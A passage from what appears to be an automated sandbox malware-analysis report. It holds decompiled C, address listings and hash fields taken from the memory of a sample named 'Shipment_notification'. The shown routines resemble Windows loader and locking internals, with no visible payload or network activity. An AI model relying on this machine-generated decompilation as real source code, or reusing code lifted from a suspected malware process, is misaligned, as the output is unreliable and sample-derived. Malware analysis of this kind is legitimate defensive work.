                                                                                										__eflags =  *_t57;
                                                                                										if( *_t57 == 0) {
                                                                                											goto L49;
                                                                                										}
                                                                                									}
                                                                                									goto L48;
                                                                                								}
                                                                                								L31:
                                                                                								_t229 = _t241;
                                                                                								goto L14;
                                                                                							}
                                                                                							_v73 = 1;
                                                                                							_v64 = _t240;
                                                                                							asm("lock bts dword [esi], 0x0");
                                                                                							if(_t275 < 0) {
                                                                                								_t231 =  *0x1bd8608; // 0x0
                                                                                								while(1) {
                                                                                									_v60 = _t231;
                                                                                									__eflags = _t231 & 0x00000001;
                                                                                									if((_t231 & 0x00000001) != 0) {
                                                                                										goto L76;
                                                                                									}
                                                                                									_t73 = _t231 + 1; // 0x1
                                                                                									_t210 = _t73;
                                                                                									asm("lock cmpxchg [edi], ecx");
                                                                                									__eflags = _t231 - _t231;
                                                                                									if(_t231 != _t231) {
                                                                                										L92:
                                                                                										_t133 = E01B16B90(_t210,  &_v64);
                                                                                										_t262 =  *0x1bd8608; // 0x0
                                                                                										L93:
                                                                                										_t231 = _t262;
                                                                                										continue;
                                                                                									}
                                                                                									_t240 = _v56;
                                                                                									goto L10;
                                                                                									L76:
                                                                                									_t169 = E01B1E180(_t133);
                                                                                									__eflags = _t169;
                                                                                									if(_t169 != 0) {
                                                                                										_push(0xc000004b);
                                                                                										_push(0xffffffff);
                                                                                										E01B297C0();
                                                                                										_t231 = _v68;
                                                                                									}
                                                                                									_v72 = 0;
                                                                                									_v24 =  *( *[fs:0x18] + 0x24);
                                                                                									_v16 = 3;
                                                                                									_v28 = 0;
                                                                                									__eflags = _t231 & 0x00000002;
                                                                                									if((_t231 & 0x00000002) == 0) {
                                                                                										_v32 =  &_v36;
                                                                                										_t174 = _t231 >> 4;
                                                                                										__eflags = 1 - _t174;
                                                                                										_v20 = _t174;
                                                                                										asm("sbb ecx, ecx");
                                                                                										_t210 = 3 |  &_v36;
                                                                                										__eflags = _t174;
                                                                                										if(_t174 == 0) {
                                                                                											_v20 = 0xfffffffe;
                                                                                										}
                                                                                									} else {
                                                                                										_v32 = 0;
                                                                                										_v20 = 0xffffffff;
                                                                                										_v36 = _t231 & 0xfffffff0;
                                                                                										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
                                                                                										_v72 =  !(_t231 >> 2) & 0xffffff01;
                                                                                									}
                                                                                									asm("lock cmpxchg [edi], esi");
                                                                                									_t262 = _t231;
                                                                                									__eflags = _t262 - _t231;
                                                                                									if(_t262 != _t231) {
                                                                                										goto L92;
                                                                                									} else {
                                                                                										__eflags = _v72;
                                                                                										if(_v72 != 0) {
                                                                                											E01B2006A(0x1bd8608, _t210);
                                                                                										}
                                                                                										__eflags =  *0x7ffe036a - 1;
                                                                                										if(__eflags <= 0) {
                                                                                											L89:
                                                                                											_t133 =  &_v16;
                                                                                											asm("lock btr dword [eax], 0x1");
                                                                                											if(__eflags >= 0) {
                                                                                												goto L93;
                                                                                											} else {
                                                                                												goto L90;
                                                                                											}
                                                                                											do {
                                                                                												L90:
                                                                                												_push(0);
                                                                                												_push(0x1bd8608);
                                                                                												E01B2B180();
                                                                                												_t133 = _v24;
                                                                                												__eflags = _t133 & 0x00000004;
                                                                                											} while ((_t133 & 0x00000004) == 0);
                                                                                											goto L93;
                                                                                										} else {
                                                                                											_t218 =  *0x1bd6904; // 0x400
                                                                                											__eflags = _t218;
                                                                                											if(__eflags == 0) {
                                                                                												goto L89;
                                                                                											} else {
                                                                                												goto L87;
                                                                                											}
                                                                                											while(1) {
                                                                                												L87:
                                                                                												__eflags = _v16 & 0x00000002;
                                                                                												if(__eflags == 0) {
                                                                                													goto L89;
                                                                                												}
                                                                                												asm("pause");
                                                                                												_t218 = _t218 - 1;
                                                                                												__eflags = _t218;
                                                                                												if(__eflags != 0) {
                                                                                													continue;
                                                                                												}
                                                                                												goto L89;
                                                                                											}
                                                                                											goto L89;
                                                                                										}
                                                                                									}
                                                                                								}
                                                                                							}
                                                                                							L10:
                                                                                							_t229 =  *0x1bd6e48; // 0x0
                                                                                							_v72 = _t229;
                                                                                							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                                                                                								E01AFFFB0(_t198, _t240, 0x1bd8608);
                                                                                								_t253 = _v76;
                                                                                								goto L29;
                                                                                							} else {
                                                                                								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
                                                                                								asm("lock cmpxchg [esi], ecx");
                                                                                								_t215 = 1;
                                                                                								if(1 != 1) {
                                                                                									while(1) {
                                                                                										_t246 = _t215 & 0x00000006;
                                                                                										_t180 = _t215;
                                                                                										__eflags = _t246 - 2;
                                                                                										_v56 = _t246;
                                                                                										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
                                                                                										asm("lock cmpxchg [edi], esi");
                                                                                										_t248 = _v56;
                                                                                										__eflags = _t180 - _t215;
                                                                                										if(_t180 == _t215) {
                                                                                											break;
                                                                                										}
                                                                                										_t215 = _t180;
                                                                                									}
                                                                                									__eflags = _t248 - 2;
                                                                                									if(_t248 == 2) {
                                                                                										__eflags = 0;
                                                                                										E01B200C2(0x1bd8608, 0, _t235);
                                                                                									}
                                                                                									_t229 = _v72;
                                                                                								}
                                                                                								goto L14;
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				_t227 = 0;
                                                                                				_v75 = 0;
                                                                                				if(_t128 != 0) {
                                                                                					goto L4;
                                                                                				}
                                                                                				goto L2;
                                                                                			}

                                                                                0x00000000
                                                                                0x01b5582d
                                                                                0x00000000
                                                                                0x01b12228
                                                                                0x01b12228
                                                                                0x00000000
                                                                                0x01b12228
                                                                                0x01b12222
                                                                                0x01b12214
                                                                                0x01b12214
                                                                                0x00000000
                                                                                0x01b12114
                                                                                0x01b12114
                                                                                0x01b12114
                                                                                0x01b1211a
                                                                                0x01b1211c
                                                                                0x01b12348
                                                                                0x01b1234d
                                                                                0x01b55840
                                                                                0x01b55845
                                                                                0x01b55848
                                                                                0x01b5584e
                                                                                0x01b5584e
                                                                                0x01b55848
                                                                                0x01b12353
                                                                                0x01b12355
                                                                                0x01b12388
                                                                                0x01b12388
                                                                                0x01b12368
                                                                                0x01b1236a
                                                                                0x01b1236c
                                                                                0x01b1238f
                                                                                0x00000000
                                                                                0x01b1236e
                                                                                0x01b1236e
                                                                                0x01b1218e
                                                                                0x01b1218e
                                                                                0x01b12191
                                                                                0x01b12195
                                                                                0x01b55a03
                                                                                0x01b55a06
                                                                                0x01b55a0c
                                                                                0x01b55a0f
                                                                                0x01b55a11
                                                                                0x01b55a13
                                                                                0x01b55a13
                                                                                0x01b55a19
                                                                                0x01b55a1f
                                                                                0x00000000
                                                                                0x01b1219b
                                                                                0x01b1219b
                                                                                0x01b121a0
                                                                                0x01b12282
                                                                                0x01b12284
                                                                                0x01b12284
                                                                                0x01b12284
                                                                                0x01b12284
                                                                                0x01b121a6
                                                                                0x01b121a9
                                                                                0x01b121ac
                                                                                0x01b121ae
                                                                                0x01b121b3
                                                                                0x01b1228b
                                                                                0x01b12290
                                                                                0x01b12379
                                                                                0x01b12296
                                                                                0x01b12298
                                                                                0x01b12298
                                                                                0x01b12290
                                                                                0x01b121b9
                                                                                0x01b121be
                                                                                0x01b122a2
                                                                                0x01b122a2
                                                                                0x01b121c4
                                                                                0x01b121c8
                                                                                0x01b121cc
                                                                                0x01b121d0
                                                                                0x01b121d4
                                                                                0x01b121de
                                                                                0x01b121e3
                                                                                0x01b55a29
                                                                                0x01b55a2c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b55a3b
                                                                                0x00000000
                                                                                0x01b121e9
                                                                                0x01b121e9
                                                                                0x01b121e9
                                                                                0x01b121ee
                                                                                0x01b121f1
                                                                                0x01b55a45
                                                                                0x01b55a4b
                                                                                0x01b55a52
                                                                                0x01b55a58
                                                                                0x01b55a5d
                                                                                0x01b55a5f
                                                                                0x01b55a71
                                                                                0x01b55a61
                                                                                0x01b55a6a
                                                                                0x01b55a6a
                                                                                0x01b55a76
                                                                                0x01b55a79
                                                                                0x01b55a7f
                                                                                0x01b55a83
                                                                                0x01b55a85
                                                                                0x01b55a87
                                                                                0x01b55a87
                                                                                0x01b55a8c
                                                                                0x01b55a91
                                                                                0x01b55a97
                                                                                0x01b55a9f
                                                                                0x01b55aa0
                                                                                0x01b55aa1
                                                                                0x01b55aa6
                                                                                0x01b55aab
                                                                                0x01b55ab1
                                                                                0x01b55ab3
                                                                                0x01b55ab9
                                                                                0x01b55aca
                                                                                0x01b55ad4
                                                                                0x01b55ad4
                                                                                0x01b55ade
                                                                                0x01b55ade
                                                                                0x01b55aab
                                                                                0x01b55a79
                                                                                0x01b55a52
                                                                                0x01b121f7
                                                                                0x01b121f9
                                                                                0x01b121fe
                                                                                0x01b121fe
                                                                                0x01b121e3
                                                                                0x01b12195
                                                                                0x01b1236c
                                                                                0x01b12122
                                                                                0x01b12122
                                                                                0x01b12124
                                                                                0x01b12231
                                                                                0x01b12236
                                                                                0x01b12236
                                                                                0x01b12238
                                                                                0x01b12238
                                                                                0x01b12240
                                                                                0x01b12242
                                                                                0x01b12244
                                                                                0x01b559fc
                                                                                0x01b1218c
                                                                                0x01b1218c
                                                                                0x00000000
                                                                                0x01b1218c
                                                                                0x01b1224a
                                                                                0x01b1224f
                                                                                0x01b12256
                                                                                0x01b12304
                                                                                0x01b12309
                                                                                0x01b1230f
                                                                                0x01b1231e
                                                                                0x01b1231e
                                                                                0x01b1231e
                                                                                0x01b12320
                                                                                0x01b12325
                                                                                0x01b1232a
                                                                                0x01b1232c
                                                                                0x01b1233e
                                                                                0x01b1233e
                                                                                0x00000000
                                                                                0x01b1232c
                                                                                0x01b12311
                                                                                0x01b12317
                                                                                0x01b1231a
                                                                                0x01b1231c
                                                                                0x01b12380
                                                                                0x01b12380
                                                                                0x01b12380
                                                                                0x01b12384
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b12386
                                                                                0x00000000
                                                                                0x01b1231c
                                                                                0x01b1225c
                                                                                0x01b1225c
                                                                                0x00000000
                                                                                0x01b1225c
                                                                                0x01b1212a
                                                                                0x01b12134
                                                                                0x01b12138
                                                                                0x01b1213d
                                                                                0x01b55858
                                                                                0x01b55863
                                                                                0x01b55863
                                                                                0x01b55867
                                                                                0x01b5586a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b5586c
                                                                                0x01b5586c
                                                                                0x01b55871
                                                                                0x01b55875
                                                                                0x01b55877
                                                                                0x01b55997
                                                                                0x01b5599c
                                                                                0x01b559a1
                                                                                0x01b559a7
                                                                                0x01b559a7
                                                                                0x00000000
                                                                                0x01b559a7
                                                                                0x01b5587d
                                                                                0x00000000
                                                                                0x01b5588b
                                                                                0x01b5588b
                                                                                0x01b55890
                                                                                0x01b55892
                                                                                0x01b55894
                                                                                0x01b55899
                                                                                0x01b5589b
                                                                                0x01b558a0
                                                                                0x01b558a0
                                                                                0x01b558aa
                                                                                0x01b558b2
                                                                                0x01b558b6
                                                                                0x01b558be
                                                                                0x01b558c6
                                                                                0x01b558c9
                                                                                0x01b5590d
                                                                                0x01b55917
                                                                                0x01b5591a
                                                                                0x01b5591c
                                                                                0x01b55920
                                                                                0x01b55928
                                                                                0x01b5592a
                                                                                0x01b5592c
                                                                                0x01b5592e
                                                                                0x01b5592e
                                                                                0x01b558cb
                                                                                0x01b558cd
                                                                                0x01b558d8
                                                                                0x01b558e0
                                                                                0x01b558f4
                                                                                0x01b558fe
                                                                                0x01b558fe
                                                                                0x01b5593a
                                                                                0x01b5593e
                                                                                0x01b55940
                                                                                0x01b55942
                                                                                0x00000000
                                                                                0x01b55944
                                                                                0x01b55944
                                                                                0x01b55949
                                                                                0x01b5594e
                                                                                0x01b5594e
                                                                                0x01b55953
                                                                                0x01b5595b
                                                                                0x01b55976
                                                                                0x01b55976
                                                                                0x01b5597a
                                                                                0x01b5597f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b55981
                                                                                0x01b55981
                                                                                0x01b55981
                                                                                0x01b55983
                                                                                0x01b55988
                                                                                0x01b5598d
                                                                                0x01b55991
                                                                                0x01b55991
                                                                                0x00000000
                                                                                0x01b5595d
                                                                                0x01b5595d
                                                                                0x01b55963
                                                                                0x01b55965
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b55967
                                                                                0x01b55967
                                                                                0x01b5596b
                                                                                0x01b5596d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b5596f
                                                                                0x01b55971
                                                                                0x01b55971
                                                                                0x01b55974
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b55974
                                                                                0x00000000
                                                                                0x01b55967
                                                                                0x01b5595b
                                                                                0x01b55942
                                                                                0x01b55863
                                                                                0x01b12143
                                                                                0x01b12143
                                                                                0x01b12149
                                                                                0x01b1214f
                                                                                0x01b122f1
                                                                                0x01b122f6
                                                                                0x00000000
                                                                                0x01b12173
                                                                                0x01b12173
                                                                                0x01b1217d
                                                                                0x01b12181

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6515ec494a6008758cd290f079750361084866d4e6bf7b1fadc81fde3aecec25
                                                                                • Instruction ID: 0d2ee518c889937cf65c2fa3e1298ebb66d6e306821b74f9442536f2c7388dee
                                                                                • Opcode Fuzzy Hash: 6515ec494a6008758cd290f079750361084866d4e6bf7b1fadc81fde3aecec25
                                                                                • Instruction Fuzzy Hash: 9BF105356083419FEB3ECB2DC44076A7BE1EF85324F6686EDE9958B285D734D841CB82
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 87%
                                                                                			E01AFD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
                                                                                				signed int _v8;
                                                                                				intOrPtr _v20;
                                                                                				signed int _v36;
                                                                                				intOrPtr* _v40;
                                                                                				signed int _v44;
                                                                                				signed int _v48;
                                                                                				signed char _v52;
                                                                                				signed int _v60;
                                                                                				signed int _v64;
                                                                                				signed int _v68;
                                                                                				signed int _v72;
                                                                                				signed int _v76;
                                                                                				intOrPtr _v80;
                                                                                				signed int _v84;
                                                                                				intOrPtr _v100;
                                                                                				intOrPtr _v104;
                                                                                				signed int _v108;
                                                                                				signed int _v112;
                                                                                				signed int _v116;
                                                                                				intOrPtr _v120;
                                                                                				signed int _v132;
                                                                                				char _v140;
                                                                                				char _v144;
                                                                                				char _v157;
                                                                                				signed int _v164;
                                                                                				signed int _v168;
                                                                                				signed int _v169;
                                                                                				intOrPtr _v176;
                                                                                				signed int _v180;
                                                                                				signed int _v184;
                                                                                				intOrPtr _v188;
                                                                                				signed int _v192;
                                                                                				signed int _v200;
                                                                                				signed int _v208;
                                                                                				intOrPtr* _v212;
                                                                                				char _v216;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				signed int _t204;
                                                                                				void* _t208;
                                                                                				signed int _t211;
                                                                                				signed int _t216;
                                                                                				intOrPtr _t217;
                                                                                				intOrPtr* _t218;
                                                                                				signed int _t226;
                                                                                				signed int _t239;
                                                                                				signed int* _t247;
                                                                                				signed int _t249;
                                                                                				void* _t252;
                                                                                				signed int _t256;
                                                                                				signed int _t269;
                                                                                				signed int _t271;
                                                                                				signed int _t277;
                                                                                				signed int _t279;
                                                                                				intOrPtr _t283;
                                                                                				signed int _t287;
                                                                                				signed int _t288;
                                                                                				void* _t289;
                                                                                				signed char _t290;
                                                                                				signed int _t292;
                                                                                				signed int* _t293;
                                                                                				signed int _t306;
                                                                                				signed int _t307;
                                                                                				signed int _t308;
                                                                                				signed int _t309;
                                                                                				signed int _t310;
                                                                                				intOrPtr _t311;
                                                                                				intOrPtr _t312;
                                                                                				signed int _t319;
                                                                                				signed int _t320;
                                                                                				signed int* _t324;
                                                                                				signed int _t337;
                                                                                				signed int _t338;
                                                                                				signed int _t339;
                                                                                				signed int* _t340;
                                                                                				void* _t341;
                                                                                				signed int _t344;
                                                                                				signed int _t348;
                                                                                				signed int _t349;
                                                                                				signed int _t351;
                                                                                				intOrPtr _t353;
                                                                                				void* _t354;
                                                                                				signed int _t356;
                                                                                				signed int _t358;
                                                                                				intOrPtr _t359;
                                                                                				signed int _t363;
                                                                                				signed short* _t365;
                                                                                				void* _t367;
                                                                                				intOrPtr _t369;
                                                                                				void* _t370;
                                                                                				signed int _t371;
                                                                                				signed int _t372;
                                                                                				void* _t374;
                                                                                				signed int _t376;
                                                                                				void* _t384;
                                                                                				signed int _t387;
                                                                                
                                                                                				_v8 =  *0x1bdd360 ^ _t376;
                                                                                				_t2 =  &_a20;
                                                                                				 *_t2 = _a20 & 0x00000001;
                                                                                				_t287 = _a4;
                                                                                				_v200 = _a12;
                                                                                				_t365 = _a8;
                                                                                				_v212 = _a16;
                                                                                				_v180 = _a24;
                                                                                				_v168 = 0;
                                                                                				_v157 = 0;
                                                                                				if( *_t2 != 0) {
                                                                                					__eflags = L01AF6600(0x1bd52d8);
                                                                                					if(__eflags == 0) {
                                                                                						goto L1;
                                                                                					} else {
                                                                                						_v188 = 6;
                                                                                					}
                                                                                				} else {
                                                                                					L1:
                                                                                					_v188 = 9;
                                                                                				}
                                                                                				if(_t365 == 0) {
                                                                                					_v164 = 0;
                                                                                					goto L5;
                                                                                				} else {
                                                                                					_t363 =  *_t365 & 0x0000ffff;
                                                                                					_t341 = _t363 + 1;
                                                                                					if((_t365[1] & 0x0000ffff) < _t341) {
                                                                                						L109:
                                                                                						__eflags = _t341 - 0x80;
                                                                                						if(_t341 <= 0x80) {
                                                                                							_t281 =  &_v140;
                                                                                							_v164 =  &_v140;
                                                                                							goto L114;
                                                                                						} else {
                                                                                							_t283 =  *0x1bd7b9c; // 0x0
                                                                                							_t281 = L01B04620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
                                                                                							_v164 = _t281;
                                                                                							__eflags = _t281;
                                                                                							if(_t281 != 0) {
                                                                                								_v157 = 1;
                                                                                								L114:
                                                                                								E01B2F3E0(_t281, _t365[2], _t363);
                                                                                								_t200 = _v164;
                                                                                								 *((char*)(_v164 + _t363)) = 0;
                                                                                								goto L5;
                                                                                							} else {
                                                                                								_t204 = 0xc000009a;
                                                                                								goto L47;
                                                                                							}
                                                                                						}
                                                                                					} else {
                                                                                						_t200 = _t365[2];
                                                                                						_v164 = _t200;
                                                                                						if( *((char*)(_t200 + _t363)) != 0) {
                                                                                							goto L109;
                                                                                						} else {
                                                                                							while(1) {
                                                                                								L5:
                                                                                								_t353 = 0;
                                                                                								_t342 = 0x1000;
                                                                                								_v176 = 0;
                                                                                								if(_t287 == 0) {
                                                                                									break;
                                                                                								}
                                                                                								_t384 = _t287 -  *0x1bd7b90; // 0x77090000
                                                                                								if(_t384 == 0) {
                                                                                									_t353 =  *0x1bd7b8c; // 0x1582ac0
                                                                                									_v176 = _t353;
                                                                                									_t320 = ( *(_t353 + 0x50))[8];
                                                                                									_v184 = _t320;
                                                                                								} else {
                                                                                									E01B02280(_t200, 0x1bd84d8);
                                                                                									_t277 =  *0x1bd85f4; // 0x1582fb0
                                                                                									_t351 =  *0x1bd85f8 & 1;
                                                                                									while(_t277 != 0) {
                                                                                										_t337 =  *(_t277 - 0x50);
                                                                                										if(_t337 > _t287) {
                                                                                											_t338 = _t337 | 0xffffffff;
                                                                                										} else {
                                                                                											asm("sbb ecx, ecx");
                                                                                											_t338 =  ~_t337;
                                                                                										}
                                                                                										_t387 = _t338;
                                                                                										if(_t387 < 0) {
                                                                                											_t339 =  *_t277;
                                                                                											__eflags = _t351;
                                                                                											if(_t351 != 0) {
                                                                                												__eflags = _t339;
                                                                                												if(_t339 == 0) {
                                                                                													goto L16;
                                                                                												} else {
                                                                                													goto L118;
                                                                                												}
                                                                                												goto L151;
                                                                                											} else {
                                                                                												goto L16;
                                                                                											}
                                                                                											goto L17;
                                                                                										} else {
                                                                                											if(_t387 <= 0) {
                                                                                												__eflags = _t277;
                                                                                												if(_t277 != 0) {
                                                                                													_t340 =  *(_t277 - 0x18);
                                                                                													_t24 = _t277 - 0x68; // 0x1582f48
                                                                                													_t353 = _t24;
                                                                                													_v176 = _t353;
                                                                                													__eflags = _t340[3] - 0xffffffff;
                                                                                													if(_t340[3] != 0xffffffff) {
                                                                                														_t279 =  *_t340;
                                                                                														__eflags =  *(_t279 - 0x20) & 0x00000020;
                                                                                														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
                                                                                															asm("lock inc dword [edi+0x9c]");
                                                                                															_t340 =  *(_t353 + 0x50);
                                                                                														}
                                                                                													}
                                                                                													_v184 = _t340[8];
                                                                                												}
                                                                                											} else {
                                                                                												_t339 =  *(_t277 + 4);
                                                                                												if(_t351 != 0) {
                                                                                													__eflags = _t339;
                                                                                													if(_t339 == 0) {
                                                                                														goto L16;
                                                                                													} else {
                                                                                														L118:
                                                                                														_t277 = _t277 ^ _t339;
                                                                                														goto L17;
                                                                                													}
                                                                                													goto L151;
                                                                                												} else {
                                                                                													L16:
                                                                                													_t277 = _t339;
                                                                                												}
                                                                                												goto L17;
                                                                                											}
                                                                                										}
                                                                                										goto L25;
                                                                                										L17:
                                                                                									}
                                                                                									L25:
                                                                                									E01AFFFB0(_t287, _t353, 0x1bd84d8);
                                                                                									_t320 = _v184;
                                                                                									_t342 = 0x1000;
                                                                                								}
                                                                                								if(_t353 == 0) {
                                                                                									break;
                                                                                								} else {
                                                                                									_t366 = 0;
                                                                                									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
                                                                                										_t288 = _v164;
                                                                                										if(_t353 != 0) {
                                                                                											_t342 = _t288;
                                                                                											_t374 = E01B3CC99(_t353, _t288, _v200, 1,  &_v168);
                                                                                											if(_t374 >= 0) {
                                                                                												if(_v184 == 7) {
                                                                                													__eflags = _a20;
                                                                                													if(__eflags == 0) {
                                                                                														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
                                                                                														if(__eflags != 0) {
                                                                                															_t271 = L01AF6600(0x1bd52d8);
                                                                                															__eflags = _t271;
                                                                                															if(__eflags == 0) {
                                                                                																_t342 = 0;
                                                                                																_v169 = _t271;
                                                                                																_t374 = E01AF7926( *(_t353 + 0x50), 0,  &_v169);
                                                                                															}
                                                                                														}
                                                                                													}
                                                                                												}
                                                                                												if(_t374 < 0) {
                                                                                													_v168 = 0;
                                                                                												} else {
                                                                                													if( *0x1bdb239 != 0) {
                                                                                														_t342 =  *(_t353 + 0x18);
                                                                                														E01B6E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
                                                                                													}
                                                                                													if( *0x1bd8472 != 0) {
                                                                                														_v192 = 0;
                                                                                														_t342 =  *0x7ffe0330;
                                                                                														asm("ror edi, cl");
                                                                                														 *0x1bdb1e0( &_v192, _t353, _v168, 0, _v180);
                                                                                														 *( *0x1bdb218 ^  *0x7ffe0330)();
                                                                                														_t269 = _v192;
                                                                                														_t353 = _v176;
                                                                                														__eflags = _t269;
                                                                                														if(__eflags != 0) {
                                                                                															_v168 = _t269;
                                                                                														}
                                                                                													}
                                                                                												}
                                                                                											}
                                                                                											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
                                                                                												_t366 = 0xc000007a;
                                                                                											}
                                                                                											_t247 =  *(_t353 + 0x50);
                                                                                											if(_t247[3] == 0xffffffff) {
                                                                                												L40:
                                                                                												if(_t366 == 0xc000007a) {
                                                                                													__eflags = _t288;
                                                                                													if(_t288 == 0) {
                                                                                														goto L136;
                                                                                													} else {
                                                                                														_t366 = 0xc0000139;
                                                                                													}
                                                                                													goto L54;
                                                                                												}
                                                                                											} else {
                                                                                												_t249 =  *_t247;
                                                                                												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
                                                                                													goto L40;
                                                                                												} else {
                                                                                													_t250 = _t249 | 0xffffffff;
                                                                                													asm("lock xadd [edi+0x9c], eax");
                                                                                													if((_t249 | 0xffffffff) == 0) {
                                                                                														E01B02280(_t250, 0x1bd84d8);
                                                                                														_t342 =  *(_t353 + 0x54);
                                                                                														_t165 = _t353 + 0x54; // 0x54
                                                                                														_t252 = _t165;
                                                                                														__eflags =  *(_t342 + 4) - _t252;
                                                                                														if( *(_t342 + 4) != _t252) {
                                                                                															L135:
                                                                                															asm("int 0x29");
                                                                                															L136:
                                                                                															_t288 = _v200;
                                                                                															_t366 = 0xc0000138;
                                                                                															L54:
                                                                                															_t342 = _t288;
                                                                                															L01B23898(0, _t288, _t366);
                                                                                														} else {
                                                                                															_t324 =  *(_t252 + 4);
                                                                                															__eflags =  *_t324 - _t252;
                                                                                															if( *_t324 != _t252) {
                                                                                																goto L135;
                                                                                															} else {
                                                                                																 *_t324 = _t342;
                                                                                																 *(_t342 + 4) = _t324;
                                                                                																_t293 =  *(_t353 + 0x50);
                                                                                																_v180 =  *_t293;
                                                                                																E01AFFFB0(_t293, _t353, 0x1bd84d8);
                                                                                																__eflags =  *((short*)(_t353 + 0x3a));
                                                                                																if( *((short*)(_t353 + 0x3a)) != 0) {
                                                                                																	_t342 = 0;
                                                                                																	__eflags = 0;
                                                                                																	E01B237F5(_t353, 0);
                                                                                																}
                                                                                																E01B20413(_t353);
                                                                                																_t256 =  *(_t353 + 0x48);
                                                                                																__eflags = _t256;
                                                                                																if(_t256 != 0) {
                                                                                																	__eflags = _t256 - 0xffffffff;
                                                                                																	if(_t256 != 0xffffffff) {
                                                                                																		E01B19B10(_t256);
                                                                                																	}
                                                                                																}
                                                                                																__eflags =  *(_t353 + 0x28);
                                                                                																if( *(_t353 + 0x28) != 0) {
                                                                                																	_t174 = _t353 + 0x24; // 0x24
                                                                                																	E01B102D6(_t174);
                                                                                																}
                                                                                																L01B077F0( *0x1bd7b98, 0, _t353);
                                                                                																__eflags = _v180 - _t293;
                                                                                																if(__eflags == 0) {
                                                                                																	E01B1C277(_t293, _t366);
                                                                                																}
                                                                                																_t288 = _v164;
                                                                                																goto L40;
                                                                                															}
                                                                                														}
                                                                                													} else {
                                                                                														goto L40;
                                                                                													}
                                                                                												}
                                                                                											}
                                                                                										}
                                                                                									} else {
                                                                                										L01AFEC7F(_t353);
                                                                                										L01B119B8(_t287, 0, _t353, 0);
                                                                                										_t200 = E01AEF4E3(__eflags);
                                                                                										continue;
                                                                                									}
                                                                                								}
                                                                                								L41:
                                                                                								if(_v157 != 0) {
                                                                                									L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
                                                                                								}
                                                                                								if(_t366 < 0 || ( *0x1bdb2f8 |  *0x1bdb2fc) == 0 || ( *0x1bdb2e4 & 0x00000001) != 0) {
                                                                                									L46:
                                                                                									 *_v212 = _v168;
                                                                                									_t204 = _t366;
                                                                                									L47:
                                                                                									_pop(_t354);
                                                                                									_pop(_t367);
                                                                                									_pop(_t289);
                                                                                									return L01B2B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
                                                                                								} else {
                                                                                									_v200 = 0;
                                                                                									if(( *0x1bdb2ec >> 0x00000008 & 0x00000003) == 3) {
                                                                                										_t355 = _v168;
                                                                                										_t342 =  &_v208;
                                                                                										_t208 = E01B96B68(_v168,  &_v208, _v168, __eflags);
                                                                                										__eflags = _t208 - 1;
                                                                                										if(_t208 == 1) {
                                                                                											goto L46;
                                                                                										} else {
                                                                                											__eflags = _v208 & 0x00000010;
                                                                                											if((_v208 & 0x00000010) == 0) {
                                                                                												goto L46;
                                                                                											} else {
                                                                                												_t342 = 4;
                                                                                												_t366 = E01B96AEB(_t355, 4,  &_v216);
                                                                                												__eflags = _t366;
                                                                                												if(_t366 >= 0) {
                                                                                													goto L46;
                                                                                												} else {
                                                                                													asm("int 0x29");
                                                                                													_t356 = 0;
                                                                                													_v44 = 0;
                                                                                													_t290 = _v52;
                                                                                													__eflags = 0;
                                                                                													if(0 == 0) {
                                                                                														L108:
                                                                                														_t356 = 0;
                                                                                														_v44 = 0;
                                                                                														goto L63;
                                                                                													} else {
                                                                                														__eflags = 0;
                                                                                														if(0 < 0) {
                                                                                															goto L108;
                                                                                														}
                                                                                														L63:
                                                                                														_v112 = _t356;
                                                                                														__eflags = _t356;
                                                                                														if(_t356 == 0) {
                                                                                															L143:
                                                                                															_v8 = 0xfffffffe;
                                                                                															_t211 = 0xc0000089;
                                                                                														} else {
                                                                                															_v36 = 0;
                                                                                															_v60 = 0;
                                                                                															_v48 = 0;
                                                                                															_v68 = 0;
                                                                                															_v44 = _t290 & 0xfffffffc;
                                                                                															E01AFE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
                                                                                															_t306 = _v68;
                                                                                															__eflags = _t306;
                                                                                															if(_t306 == 0) {
                                                                                																_t216 = 0xc000007b;
                                                                                																_v36 = 0xc000007b;
                                                                                																_t307 = _v60;
                                                                                															} else {
                                                                                																__eflags = _t290 & 0x00000001;
                                                                                																if(__eflags == 0) {
                                                                                																	_t349 =  *(_t306 + 0x18) & 0x0000ffff;
                                                                                																	__eflags = _t349 - 0x10b;
                                                                                																	if(_t349 != 0x10b) {
                                                                                																		__eflags = _t349 - 0x20b;
